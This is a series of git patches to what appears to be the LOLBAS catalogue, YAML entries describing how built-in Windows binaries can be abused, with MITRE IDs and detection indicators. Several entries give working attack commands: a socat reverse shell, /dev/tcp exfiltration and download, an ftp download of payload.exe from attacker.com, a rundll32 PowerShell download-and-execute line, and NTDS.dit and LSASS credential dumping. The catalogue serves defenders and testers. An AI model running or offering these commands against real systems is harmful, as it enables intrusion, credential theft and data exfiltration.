+ - Command: netsh.exe add helper C:\Users\User\file.dll + Description: Use Netsh in order to execute a .dll file and also gain persistence, every time the netsh command is called + Usecase: Proxy execution of .dll + Category: Execute + Privileges: User + MitreID: T1128 + MitreLink: https://attack.mitre.org/techniques/T1128/ + OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10 +Full_Path: + - Path: C:\WINDOWS\System32\Netsh.exe + - Path: C:\WINDOWS\SysWOW64\Netsh.exe +Code_Sample: + - Code: +Detection: + - IOC: Netsh initiating a network connection +Resources: + - Link: https://freddiebarrsmith.com/trix/trix.html + - Link: https://htmlpreview.github.io/?https://github.com/MatthewDemaske/blogbackup/blob/master/netshell.html + - Link: https://liberty-shell.com/sec/2018/07/28/netshlep/ +Acknowledgement: + - Person: 'Freddie Barr-Smith' + Handle: + - Person: 'Riccardo Spolaor' + Handle: + - Person: 'Mariano Graziano' + Handle: + - Person: 'Xabier Ugarte-Pedrero' + Handle: +--- \ No newline at end of file From c7c93e9f95f46e6b7dd180e909fd9d3eb5610dcb Mon Sep 17 00:00:00 2001 From: leo1-1 <61551576+leo1-1@users.noreply.github.com> Date: Thu, 27 Feb 2020 17:13:07 +0200 Subject: [PATCH 13/96] Create vbc.yml --- yml/OSBinaries/vbc.yml | 38 ++++++++++++++++++++++++++++++++++++++ 1 file changed, 38 insertions(+) create mode 100644 yml/OSBinaries/vbc.yml diff --git a/yml/OSBinaries/vbc.yml b/yml/OSBinaries/vbc.yml new file mode 100644 index 0000000..967520f --- /dev/null +++ b/yml/OSBinaries/vbc.yml @@ -0,0 +1,38 @@ +--- +Name: vbc.exe +Description: Binary file used for compile vbs code +Author: Lior Adar +Created: 27/02/2020 +Commands: + - Command: + vbc.exe /target:exe c:\temp\vbs\run.vb + Description: Binary file used by .NET to compile vb code to .exe + Usecase: Compile attacker code on system. Bypass defensive counter measures. + Category: Compile + Privileges required:User + MitreID: T1127 + MitreLink: https://attack.mitre.org/techniques/T1127/ + OperatingSystem: Windows 10,7 + - Command: vbc -reference:Microsoft.VisualBasic.dll c:\temp\vbs\run.vb + Description: Description of the second command + Usecase: A description of the usecase + Category: Compile + Privileges required:User + MitreID: T1127 + MitreLink: https://attack.mitre.org/techniques/T1127/ + +Full_Path: + - Path: +c:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe +C:\Windows\Microsoft.NET\Framework64\v3.5\vbc.exe +Code_Sample: +Code: +1.vbc.exe /target:exe c:\temp\vbs\run.vb +2.vbc.exe -reference:Microsoft.VisualBasic.dll c:\temp\vbs\run.vb +Acknowledgement: + - Person: +Lior Adar +Hai Vaknin(Lux) + + +--- From 81c363ac8aa60d5159be5b7e8190b5f9be4ff1cb Mon Sep 17 00:00:00 2001 From: Oddvar Moe Date: Mon, 16 Mar 2020 19:55:27 +0100 Subject: [PATCH 14/96] Adjustment to vbc.yml contribution --- yml/OSBinaries/vbc.yml | 29 ++++++++++++----------------- 1 file changed, 12 insertions(+), 17 deletions(-) diff --git a/yml/OSBinaries/vbc.yml b/yml/OSBinaries/vbc.yml index 967520f..52a479d 100644 --- a/yml/OSBinaries/vbc.yml +++ b/yml/OSBinaries/vbc.yml @@ -4,12 +4,11 @@ Description: Binary file used for compile vbs code Author: Lior Adar Created: 27/02/2020 Commands: - - Command: - vbc.exe /target:exe c:\temp\vbs\run.vb + - Command: vbc.exe /target:exe c:\temp\vbs\run.vb Description: Binary file used by .NET to compile vb code to .exe Usecase: Compile attacker code on system. Bypass defensive counter measures. Category: Compile - Privileges required:User + Privileges: User MitreID: T1127 MitreLink: https://attack.mitre.org/techniques/T1127/ OperatingSystem: Windows 10,7 @@ -17,22 +16,18 @@ Commands: Description: Description of the second command Usecase: A description of the usecase Category: Compile - Privileges required:User + Privileges: User MitreID: T1127 MitreLink: https://attack.mitre.org/techniques/T1127/ - + OperatingSystem: Windows 10,7 Full_Path: - - Path: -c:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -C:\Windows\Microsoft.NET\Framework64\v3.5\vbc.exe + - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe + - Path: C:\Windows\Microsoft.NET\Framework64\v3.5\vbc.exe Code_Sample: -Code: -1.vbc.exe /target:exe c:\temp\vbs\run.vb -2.vbc.exe -reference:Microsoft.VisualBasic.dll c:\temp\vbs\run.vb +- Code: Acknowledgement: - - Person: -Lior Adar -Hai Vaknin(Lux) - - ---- + - Person: Lior Adar + Handle: + - Person: Hai Vaknin(Lux) + Handle: +--- \ No newline at end of file From 4bef10b147b3af50175f205266ea69cb87623c41 Mon Sep 17 00:00:00 2001 From: Oddvar Moe Date: Mon, 16 Mar 2020 20:10:17 +0100 Subject: [PATCH 15/96] adjusted rasautou and removed ntdsutil --- yml/OtherMSBinaries/Ntdsutil.yml | 26 -------------------------- 1 file changed, 26 deletions(-) delete mode 100644 yml/OtherMSBinaries/Ntdsutil.yml diff --git a/yml/OtherMSBinaries/Ntdsutil.yml b/yml/OtherMSBinaries/Ntdsutil.yml deleted file mode 100644 index 52d11df..0000000 --- a/yml/OtherMSBinaries/Ntdsutil.yml +++ /dev/null @@ -1,26 +0,0 @@ ---- -Name: ntdsutil.exe -Description: Command line utility used to export Actove Directory. -Author: 'Tony Lambert' -Created: '2020-01-10' -Commands: - - Command: ntdsutil.exe “ac i ntds” “ifm” “create full c:\” q q - Description: Dump NTDS.dit into folder - Usecase: Dumping of Active Directory NTDS.dit database - Category: Dump - Privileges: Administrator - MitreID: T1003 - MitreLink: https://attack.mitre.org/wiki/Technique/T1003 - OperatingSystem: Windows -Full_Path: - - Path: C:\Windows\System32\ntdsutil.exe -Code_Sample: - - Code: -Detection: - - IOC: ntdsutil.exe with command line including "ifm" -Resources: - - Link: https://adsecurity.org/?p=2398#CreateIFM -Acknowledgement: - - Person: Sean Metcalf - Handle: '@PyroTek3' ---- From 7a2ff4c25038bf26698538d1924ce6a9485a051d Mon Sep 17 00:00:00 2001 From: LuxNoBu!!shit <51244609+LuxNoBulIshit@users.noreply.github.com> Date: Tue, 17 Mar 2020 03:04:20 +0200 Subject: [PATCH 16/96] Create ilasm.yml --- yml/OSBinaries/ilasm.yml | 37 +++++++++++++++++++++++++++++++++++++ 1 file changed, 37 insertions(+) create mode 100644 yml/OSBinaries/ilasm.yml diff --git a/yml/OSBinaries/ilasm.yml b/yml/OSBinaries/ilasm.yml new file mode 100644 index 0000000..154c86c --- /dev/null +++ b/yml/OSBinaries/ilasm.yml @@ -0,0 +1,37 @@ +--- +Name: ilasm.exe +Description: used for compile c# code into dll or exe. +Author: Hai vaknin (lux) +Created: 17/03/2020 +Commands: + - Command: + ilasm.exe C:\public\test.txt /exe + Description: Binary file used by .NET to compile c# code to .exe + Usecase: Compile attacker code on system. Bypass defensive counter measures. + Category: Compile + Privileges required:User + MitreID: T1127 + MitreLink: https://attack.mitre.org/techniques/T1127/ + OperatingSystem: Windows 10,7 + - Command: ilasm.exe C:\Users\חי\Desktop\test.txt /dll + Description: Binary file used by .NET to compile c# code to dll + Usecase: A description of the usecase + Category: Compile + Privileges required:User + MitreID: T1127 + MitreLink: https://attack.mitre.org/techniques/T1127/ + +Full_Path: + - Path: + C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe + C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe +Code_Sample: +Code: +1.ilasm.exe C:\public\test.txt /exe +2.ilasm.exe C:\Users\חי\Desktop\test.txt /dll +Acknowledgement: + - Person: +Hai Vaknin(Lux) https://github.com/LuxNoBulIshit +Lior Adar + +--- From dc3a211c899c2c5fba5ad78337542901d11cdc5f Mon Sep 17 00:00:00 2001 From: Oddvar Moe Date: Tue, 17 Mar 2020 10:55:59 +0100 Subject: [PATCH 17/96] Re-added ntdsutil --- yml/OtherMSBinaries/Ntdsutil.yml | 26 ++++++++++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 yml/OtherMSBinaries/Ntdsutil.yml diff --git a/yml/OtherMSBinaries/Ntdsutil.yml b/yml/OtherMSBinaries/Ntdsutil.yml new file mode 100644 index 0000000..f9ae0f5 --- /dev/null +++ b/yml/OtherMSBinaries/Ntdsutil.yml @@ -0,0 +1,26 @@ +--- +Name: ntdsutil.exe +Description: Command line utility used to export Actove Directory. +Author: 'Tony Lambert' +Created: '2020-01-10' +Commands: + - Command: ntdsutil.exe "ac i ntds" "ifm" "create full c:\" q q + Description: Dump NTDS.dit into folder + Usecase: Dumping of Active Directory NTDS.dit database + Category: Dump + Privileges: Administrator + MitreID: T1003 + MitreLink: https://attack.mitre.org/wiki/Technique/T1003 + OperatingSystem: Windows +Full_Path: + - Path: C:\Windows\System32\ntdsutil.exe +Code_Sample: + - Code: +Detection: + - IOC: ntdsutil.exe with command line including "ifm" +Resources: + - Link: https://adsecurity.org/?p=2398#CreateIFM +Acknowledgement: + - Person: Sean Metcalf + Handle: '@PyroTek3' +--- \ No newline at end of file From 94d10799d3b1b30e046d8512d0f0ffc46882725d Mon Sep 17 00:00:00 2001 From: Oddvar Moe Date: Tue, 17 Mar 2020 11:05:14 +0100 Subject: [PATCH 18/96] Adjusted ilasm --- yml/OSBinaries/ilasm.yml | 31 ++++++++++++++----------------- 1 file changed, 14 insertions(+), 17 deletions(-) diff --git a/yml/OSBinaries/ilasm.yml b/yml/OSBinaries/ilasm.yml index 154c86c..3cbd1b6 100644 --- a/yml/OSBinaries/ilasm.yml +++ b/yml/OSBinaries/ilasm.yml @@ -1,37 +1,34 @@ --- -Name: ilasm.exe +Name: Ilasm.exe Description: used for compile c# code into dll or exe. Author: Hai vaknin (lux) Created: 17/03/2020 Commands: - - Command: - ilasm.exe C:\public\test.txt /exe + - Command: ilasm.exe C:\public\test.txt /exe Description: Binary file used by .NET to compile c# code to .exe Usecase: Compile attacker code on system. Bypass defensive counter measures. Category: Compile - Privileges required:User + Privileges: User MitreID: T1127 MitreLink: https://attack.mitre.org/techniques/T1127/ OperatingSystem: Windows 10,7 - - Command: ilasm.exe C:\Users\חי\Desktop\test.txt /dll + - Command: ilasm.exe C:\public\test.txt /dll Description: Binary file used by .NET to compile c# code to dll Usecase: A description of the usecase Category: Compile - Privileges required:User + Privileges: User MitreID: T1127 MitreLink: https://attack.mitre.org/techniques/T1127/ - Full_Path: - - Path: - C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe - C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe + - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe + - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Code_Sample: -Code: -1.ilasm.exe C:\public\test.txt /exe -2.ilasm.exe C:\Users\חי\Desktop\test.txt /dll +- Code: +Resources: + - Link: https://github.com/LuxNoBulIshit/BeforeCompileBy-ilasm/blob/master/hello_world.txt Acknowledgement: - - Person: -Hai Vaknin(Lux) https://github.com/LuxNoBulIshit -Lior Adar - + - Person: Hai Vaknin(Lux) + Handle: '@VakninHai' + - Person: Lior Adar + Handle: --- From cce7c5ce3a6daab089b3b13f8af8e6126ace99f3 Mon Sep 17 00:00:00 2001 From: Oddvar Moe Date: Tue, 17 Mar 2020 11:08:47 +0100 Subject: [PATCH 19/96] Adjusted error in atbroker as per issue #47 --- yml/OSBinaries/Atbroker.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/yml/OSBinaries/Atbroker.yml b/yml/OSBinaries/Atbroker.yml index 0d58b23..013ea5b 100644 --- a/yml/OSBinaries/Atbroker.yml +++ b/yml/OSBinaries/Atbroker.yml @@ -19,7 +19,7 @@ Code_Sample: - Code: Detection: - IOC: Changes to HKCU\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\Configuration - - IOC: Changes to HKCU\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs + - IOC: Changes to HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs - IOC: Unknown AT starting C:\Windows\System32\ATBroker.exe /start malware Resources: - Link: http://www.hexacorn.com/blog/2016/07/22/beyond-good-ol-run-key-part-42/ From e4face79af14a433f373724c0af5c02cb65ec880 Mon Sep 17 00:00:00 2001 From: Martin Ingesen Date: Wed, 18 Mar 2020 15:20:50 +0100 Subject: [PATCH 20/96] Using rundll32 to execute dll via SMB --- yml/OSBinaries/Rundll32.yml | 8 ++++++++ 1 file changed, 8 insertions(+) diff --git a/yml/OSBinaries/Rundll32.yml b/yml/OSBinaries/Rundll32.yml index 2d1ad59..d7f9f60 100644 --- a/yml/OSBinaries/Rundll32.yml +++ b/yml/OSBinaries/Rundll32.yml @@ -12,6 +12,14 @@ Commands: MitreID: T1085 MitreLink: https://attack.mitre.org/wiki/Technique/T1085 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + - Command: rundll32.exe \\10.10.10.10\share\payload.dll,EntryPoint + Description: Use Rundll32.exe to execute a DLL from a SMB share. EntryPoint is the name of the entry point in the .DLL file to execute. + Usecase: Execute DLL from SMB share. + Category: Execute + Privileges: User + MitreID: T1085 + MitreLink: https://attack.mitre.org/techniques/T1085 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');" Description: Use Rundll32.exe to execute a JavaScript script that runs a PowerShell script that is downloaded from a remote web site. Usecase: Execute code from Internet From d67c8f5c11b84ca971a4499420dae8883eccfdc2 Mon Sep 17 00:00:00 2001 From: "Chris \"Lopi\" Spehn" Date: Fri, 20 Mar 2020 11:51:21 -0600 Subject: [PATCH 21/96] Update RegAsm to the correct permissions --- yml/OSBinaries/Regasm.yml | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/yml/OSBinaries/Regasm.yml b/yml/OSBinaries/Regasm.yml index 1569be0..1729e21 100644 --- a/yml/OSBinaries/Regasm.yml +++ b/yml/OSBinaries/Regasm.yml @@ -8,12 +8,12 @@ Commands: Description: Loads the target .DLL file and executes the RegisterClass function. Usecase: Execute code and bypass Application whitelisting Category: AWL bypass - Privileges: User + Privileges: Local Admin MitreID: T1121 MitreLink: https://attack.mitre.org/wiki/Technique/T1121 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - - Command: regasm.exe AllTheThingsx64.dll - Description: Loads the target .DLL file and executes the RegisterClass function. + - Command: regasm.exe /U AllTheThingsx64.dll + Description: Loads the target .DLL file and executes the UnRegisterClass function. Usecase: Execute code and bypass Application whitelisting Category: Execute Privileges: User @@ -36,4 +36,4 @@ Resources: Acknowledgement: - Person: Casey Smith Handle: '@subtee' ---- \ No newline at end of file +--- From f2fa2ef9890257b088909ffb4caff6b37f8a9453 Mon Sep 17 00:00:00 2001 From: Oddvar Moe Date: Wed, 25 Mar 2020 10:26:59 +0100 Subject: [PATCH 22/96] Added additional example to wsl.exe --- yml/OtherMSBinaries/Wsl.yml | 10 ++++++++++ 1 file changed, 10 insertions(+) diff --git a/yml/OtherMSBinaries/Wsl.yml b/yml/OtherMSBinaries/Wsl.yml index 0922afc..257ec57 100644 --- a/yml/OtherMSBinaries/Wsl.yml +++ b/yml/OtherMSBinaries/Wsl.yml @@ -20,6 +20,14 @@ Commands: MitreID: T1202 MitreLink: https://attack.mitre.org/techniques/T1202 OperatingSystem: Windows 10, Windows 19 Server + - Command: wsl.exe --exec bash -c 'cat file' + Description: Cats /etc/shadow file as root + Usecase: Performs execution of arbitrary Linux commands. + Category: Execute + Privileges: User + MitreID: T1202 + MitreLink: https://attack.mitre.org/techniques/T1202 + OperatingSystem: Windows 10, Windows 19 Server Full_Path: - Path: C:\Windows\System32\wsl.exe Code_Sample: @@ -33,4 +41,6 @@ Acknowledgement: Handle: '@aionescu' - Person: Matt Handle: '@NotoriousRebel1' + - Person: Asif Matadar + Handle: '@d1r4c' --- From 6ac04d73d717835ba896054d4f031a51d861c53a Mon Sep 17 00:00:00 2001 From: Oddvar Moe Date: Wed, 25 Mar 2020 11:08:13 +0100 Subject: [PATCH 23/96] Added examples to bash.exe --- yml/OSBinaries/Bash.yml | 18 ++++++++++++++++++ 1 file changed, 18 insertions(+) diff --git a/yml/OSBinaries/Bash.yml b/yml/OSBinaries/Bash.yml index 64d96bf..f8aaaa7 100644 --- a/yml/OSBinaries/Bash.yml +++ b/yml/OSBinaries/Bash.yml @@ -12,6 +12,22 @@ Commands: MitreID: T1218 MitreLink: https://attack.mitre.org/wiki/Technique/T1218 OperatingSystem: Windows 10 + - Command: bash.exe -c "socat tcp-connect:192.168.9:66 exec:sh,pty,stderr,setsid,sigint,sane" + Description: Executes a reverseshell + Usecase: Performs execution of specified file, can be used as a defensive evasion. + Category: Execute + Privileges: User + MitreID: T1218 + MitreLink: https://attack.mitre.org/wiki/Technique/T1218 + OperatingSystem: Windows 10 + - Command: bash.exe -c 'cat file_to_exfil.zip > /dev/tcp/192.168.1.10/24' + Description: Exfiltrate data + Usecase: Performs execution of specified file, can be used as a defensive evasion. + Category: Execute + Privileges: User + MitreID: T1218 + MitreLink: https://attack.mitre.org/wiki/Technique/T1218 + OperatingSystem: Windows 10 - Command: bash.exe -c calc.exe Description: Executes calc.exe from bash.exe Usecase: Performs execution of specified file, can be used to bypass Application Whitelisting. @@ -32,4 +48,6 @@ Resources: Acknowledgement: - Person: Alex Ionescu Handle: '@aionescu' + - Person: Asif Matadar + Handle: '@d1r4c' --- \ No newline at end of file From 9f110bce0755c71af1508d947ef5788729330210 Mon Sep 17 00:00:00 2001 From: Oddvar Moe Date: Wed, 25 Mar 2020 11:24:54 +0100 Subject: [PATCH 24/96] Fixed missing octet in command --- yml/OSBinaries/Bash.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/yml/OSBinaries/Bash.yml b/yml/OSBinaries/Bash.yml index f8aaaa7..4b34149 100644 --- a/yml/OSBinaries/Bash.yml +++ b/yml/OSBinaries/Bash.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1218 MitreLink: https://attack.mitre.org/wiki/Technique/T1218 OperatingSystem: Windows 10 - - Command: bash.exe -c "socat tcp-connect:192.168.9:66 exec:sh,pty,stderr,setsid,sigint,sane" + - Command: bash.exe -c "socat tcp-connect:192.168.1.9:66 exec:sh,pty,stderr,setsid,sigint,sane" Description: Executes a reverseshell Usecase: Performs execution of specified file, can be used as a defensive evasion. Category: Execute From 9722cceb9ef18b126147259e6dfa215faa7fa36f Mon Sep 17 00:00:00 2001 From: Oddvar Moe Date: Wed, 25 Mar 2020 11:33:02 +0100 Subject: [PATCH 25/96] Added download example to wsl.exe --- yml/OtherMSBinaries/Wsl.yml | 8 ++++++++ 1 file changed, 8 insertions(+) diff --git a/yml/OtherMSBinaries/Wsl.yml b/yml/OtherMSBinaries/Wsl.yml index 257ec57..06b6384 100644 --- a/yml/OtherMSBinaries/Wsl.yml +++ b/yml/OtherMSBinaries/Wsl.yml @@ -28,6 +28,14 @@ Commands: MitreID: T1202 MitreLink: https://attack.mitre.org/techniques/T1202 OperatingSystem: Windows 10, Windows 19 Server + - Command: wsl.exe --exec bash -c 'cat < /dev/tcp/192.168.1.10/54 > binary' + Description: Downloads file from 192.168.1.10 + Usecase: Download file + Category: Download + Privileges: User + MitreID: T1202 + MitreLink: https://attack.mitre.org/techniques/T1202 + OperatingSystem: Windows 10, Windows 19 Server Full_Path: - Path: C:\Windows\System32\wsl.exe Code_Sample: From aef4b069524967f57525a0e45bb949af00d1f587 Mon Sep 17 00:00:00 2001 From: Alexandre ZANNI <16578570+noraj@users.noreply.github.com> Date: Tue, 21 Apr 2020 23:52:22 +0200 Subject: [PATCH 26/96] Download for ftp.exe add a non-interactive one-line command to download arbitrary binary with ftp.exe excessively useful on Windows XP, & Windows Server 2003 where all other LOLBAS that allow download (certutils, bitsutils, etc.) don't exist and where powershell was not install by default. --- yml/OSBinaries/Ftp.yml | 11 ++++++++++- 1 file changed, 10 insertions(+), 1 deletion(-) diff --git a/yml/OSBinaries/Ftp.yml b/yml/OSBinaries/Ftp.yml index 8b2d23c..3476a96 100644 --- a/yml/OSBinaries/Ftp.yml +++ b/yml/OSBinaries/Ftp.yml @@ -12,6 +12,14 @@ Commands: MitreID: T1218 MitreLink: https://attack.mitre.org/wiki/Technique/T1218 OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10 + - Command: cmd.exe /c "@echo open attacker.com 21>ftp.txt&@echo USER attacker>>ftp.txt&@echo PASS PaSsWoRd>>ftp.txt&@echo binary>>ftp.txt&@echo GET /payload.exe>>ftp.txt&@echo quit>>ftp.txt&@ftp -s:ftp.txt -v" + Description: Download + Usecase: Spawn new process using ftp.exe. Ftp.exe downloads the binary. + Category: Download + Privileges: User + MitreID: T1105 + MitreLink: https://attack.mitre.org/wiki/Technique/T1105 + OperatingSystem: Windows XP, Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full_Path: - Path: C:\Windows\System32\ftp.exe - Path: C:\Windows\SysWOW64\ftp.exe @@ -23,6 +31,7 @@ Resources: - Link: https://twitter.com/0xAmit/status/1070063130636640256 - Link: https://medium.com/@0xamit/lets-talk-about-security-research-discoveries-and-proper-discussion-etiquette-on-twitter-10f9be6d1939 - Link: https://ss64.com/nt/ftp.html + - Link: https://www.asafety.fr/vuln-exploit-poc/windows-dos-powershell-upload-de-fichier-en-ligne-de-commande-one-liner/ Acknowledgement: - Person: Casey Smith Handle: '@subtee' @@ -30,4 +39,4 @@ Acknowledgement: Handle: '' - Person: Amit Serper Handle: '@0xAmit ' ---- \ No newline at end of file +--- From 5de8d357b6d5419457ee312ad5a74e1cdace864a Mon Sep 17 00:00:00 2001 From: Maxime Nadeau Date: Tue, 12 May 2020 16:24:49 -0400 Subject: [PATCH 27/96] Added ttdinject.exe --- yml/OSBinaries/ttdinject.yml | 30 ++++++++++++++++++++++++++++++ 1 file changed, 30 insertions(+) create mode 100644 yml/OSBinaries/ttdinject.yml diff --git a/yml/OSBinaries/ttdinject.yml b/yml/OSBinaries/ttdinject.yml new file mode 100644 index 0000000..086e077 --- /dev/null +++ b/yml/OSBinaries/ttdinject.yml @@ -0,0 +1,30 @@ +--- +Name: ttdinject.exe +Description: Used by Windows 1809 and newer to Debug Time Travel (Underlying call of tttracer.exe) +Author: 'Maxime Nadeau' +Created: '2020-05-12' +Commands: + - Command: ttdinject.exe /ClientScenario TTDRecorder /ddload 0 /ClientParams "7 tmp.run 0 0 0 0 0 0 0 0 0 0" /launch "C:/Windows/System32/calc.exe" + Description: Execute calc using ttdinject.exe. Requires administrator privileges. A log file will be created in tmp.run. The log file can be changed, but the length (7) has to be updated. + Usecase: Spawn process using other binary + Category: Execute + Privileges: Administrator + MitreID: T1218 + MitreLink: https://attack.mitre.org/wiki/Technique/T1218 + OperatingSystem: Windows 10 1809 and newer +Full_Path: + - Path: C:\Windows\System32\ttdinject.exe + - Path: C:\Windows\Syswow64\ttdinject.exe +Code_Sample: + - Code: +Detection: + - IOC: Event ID 10 + - IOC: binary.exe spawned +Resources: + - Link: https://twitter.com/Oddvarmoe/status/1196333160470138880 +Acknowledgement: + - Person: Oddvar Moe + Handle: @oddvarmoe + - Person: Maxime Nadeau + Handle: @m_nad0 +--- From b8b265b397c86942b9a3530580c849cbd7d4d7bb Mon Sep 17 00:00:00 2001 From: Maxime Nadeau Date: Tue, 12 May 2020 16:31:47 -0400 Subject: [PATCH 28/96] Added ttdinject --- yml/OSBinaries/{ttdinject.yml => Ttdinject.yml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename yml/OSBinaries/{ttdinject.yml => Ttdinject.yml} (100%) diff --git a/yml/OSBinaries/ttdinject.yml b/yml/OSBinaries/Ttdinject.yml similarity index 100% rename from yml/OSBinaries/ttdinject.yml rename to yml/OSBinaries/Ttdinject.yml From b95fb7ed2725e86606431eeaa14321576a768ba7 Mon Sep 17 00:00:00 2001 From: Maxime Nadeau Date: Tue, 12 May 2020 16:40:49 -0400 Subject: [PATCH 29/96] Added the IOCs --- yml/OSBinaries/Ttdinject.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/yml/OSBinaries/Ttdinject.yml b/yml/OSBinaries/Ttdinject.yml index 086e077..23630e8 100644 --- a/yml/OSBinaries/Ttdinject.yml +++ b/yml/OSBinaries/Ttdinject.yml @@ -18,8 +18,8 @@ Full_Path: Code_Sample: - Code: Detection: - - IOC: Event ID 10 - - IOC: binary.exe spawned + - IOC: Parent child relationship. Ttdinject.exe parent for executed command + - IOC: Multiple queries made to the IFEO registry key of an untrusted executable (Ex. "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\payload.exe") from the ttdinject.exe process Resources: - Link: https://twitter.com/Oddvarmoe/status/1196333160470138880 Acknowledgement: From ae3d9b9b6bffd861e3f337f1611147c76005d782 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Cl=C3=A9ment=20Notin?= Date: Mon, 15 Jun 2020 23:33:34 +0200 Subject: [PATCH 30/96] sqldumper: minor fix mis-typed words --- yml/OtherMSBinaries/Sqldumper.yml | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/yml/OtherMSBinaries/Sqldumper.yml b/yml/OtherMSBinaries/Sqldumper.yml index 2a0ccd6..723ec9d 100644 --- a/yml/OtherMSBinaries/Sqldumper.yml +++ b/yml/OtherMSBinaries/Sqldumper.yml @@ -6,15 +6,15 @@ Created: '2018-05-25' Commands: - Command: sqldumper.exe 464 0 0x0110 Description: Dump process by PID and create a dump file (Appears to create a dump file called SQLDmprXXXX.mdmp). - Usecase: Dump process uisng PID. + Usecase: Dump process using PID. Category: Dump Privileges: Administrator MitreID: T1003 MitreLink: https://attack.mitre.org/wiki/Technique/T1003 OperatingSystem: Windows - Command: sqldumper.exe 540 0 0x01100:40 - Description: 0x01100:40 flag will create a Mimikatz compatibile dump file. - Usecase: Dump LSASS.exe to Mimikatz compatable dump uisng PID. + Description: 0x01100:40 flag will create a Mimikatz compatible dump file. + Usecase: Dump LSASS.exe to Mimikatz compatible dump using PID. Category: Dump Privileges: Administrator MitreID: T1003 @@ -34,4 +34,4 @@ Resources: Acknowledgement: - Person: Luis Rocha Handle: '@countuponsec' ---- \ No newline at end of file +--- From dec26ada2174e1cd8528b04539abfeec8a0a2205 Mon Sep 17 00:00:00 2001 From: JPMinty Date: Wed, 24 Jun 2020 21:09:59 +0930 Subject: [PATCH 31/96] Create explorer.yml --- yml/OSBinaries/explorer.yml | 26 ++++++++++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 yml/OSBinaries/explorer.yml diff --git a/yml/OSBinaries/explorer.yml b/yml/OSBinaries/explorer.yml new file mode 100644 index 0000000..edebed6 --- /dev/null +++ b/yml/OSBinaries/explorer.yml @@ -0,0 +1,26 @@ +--- +Name: Explorer.exe +Description: Binary used for managing files and system components within Windows +Author: 'Jai Minton' +Created: '2020-06-24' +Commands: + - Command: explorer.exe /root,"C:\Windows\System32\calc.exe" + Description: Execute calc.exe with the parent process spawning from a new instance of explorer.exe + Usecase: Performs execution of specified file with explorer parent process breaking the process tree, can be used for defense evasion. + Category: Execute + Privileges: User + MitreID: T1218 + MitreLink: https://attack.mitre.org/wiki/Technique/T1218 + OperatingSystem: Windows XP, Windows 7, Windows 8, Windows 8.1, Windows 10 +Full_Path: + - Path: C:\Windows\explorer.exe +Code_Sample: +- Code: +Detection: + - IOC: Multiple instances of explorer.exe or explorer.exe using the /root command line can help to detect this. +Resources: + - Link: https://twitter.com/CyberRaiju/status/1273597319322058752?s=20 +Acknowledgement: + - Person: Jai Minton + Handle: '@CyberRaiju' +--- \ No newline at end of file From 663724523fffc86075539b9c791364ed896c9024 Mon Sep 17 00:00:00 2001 From: JPMinty Date: Wed, 24 Jun 2020 21:15:40 +0930 Subject: [PATCH 32/96] Update explorer.yml --- yml/OSBinaries/explorer.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/yml/OSBinaries/explorer.yml b/yml/OSBinaries/explorer.yml index edebed6..73ef496 100644 --- a/yml/OSBinaries/explorer.yml +++ b/yml/OSBinaries/explorer.yml @@ -14,6 +14,7 @@ Commands: OperatingSystem: Windows XP, Windows 7, Windows 8, Windows 8.1, Windows 10 Full_Path: - Path: C:\Windows\explorer.exe + - Path: C:\Windows\SysWOW64\explorer.exe Code_Sample: - Code: Detection: From cfb5fcdf24455592a9e7b35862b360d16ee889f2 Mon Sep 17 00:00:00 2001 From: Lemonada Date: Sat, 27 Jun 2020 14:45:03 +0300 Subject: [PATCH 33/96] Create psr.yml Psr.exe can be used to take screenshots of a users sessions. --- Psr.yml | 28 ++++++++++++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 Psr.yml diff --git a/Psr.yml b/Psr.yml new file mode 100644 index 0000000..8335fec --- /dev/null +++ b/Psr.yml @@ -0,0 +1,28 @@ +--- +Name: Psr.exe +Description: Windows Problem Steps Recorder, used to record screen and clicks. +Author: Leon Rodenko +Created: '2020-06-27 +Commands: + - Command: psr.exe /start /output D:\test.zip /sc 1 /gui 0 + Description: Record a user screen without creating a GUI. You should use "psr.exe /stop" to stop recording and create output file. + Usecase: Can be used to take screenshots of the user environment + Category: Reconnaissance + Privileges: User + MitreID: T1113 + MitreLink: https://attack.mitre.org/techniques/T1113/ + OperatingSystem: since Windows 7 (client) / Windows 2008 R2 +Full_Path: + - Path: c:\windows\system32\psr.exe + - Path: c:\windows\syswow64\psr.exe +Code_Sample: + - Code: +Detection: + - IOC: psr.exe spawned + - IOC: suspicious activity when running with "/gui 0" flag +Resources: + - Link: 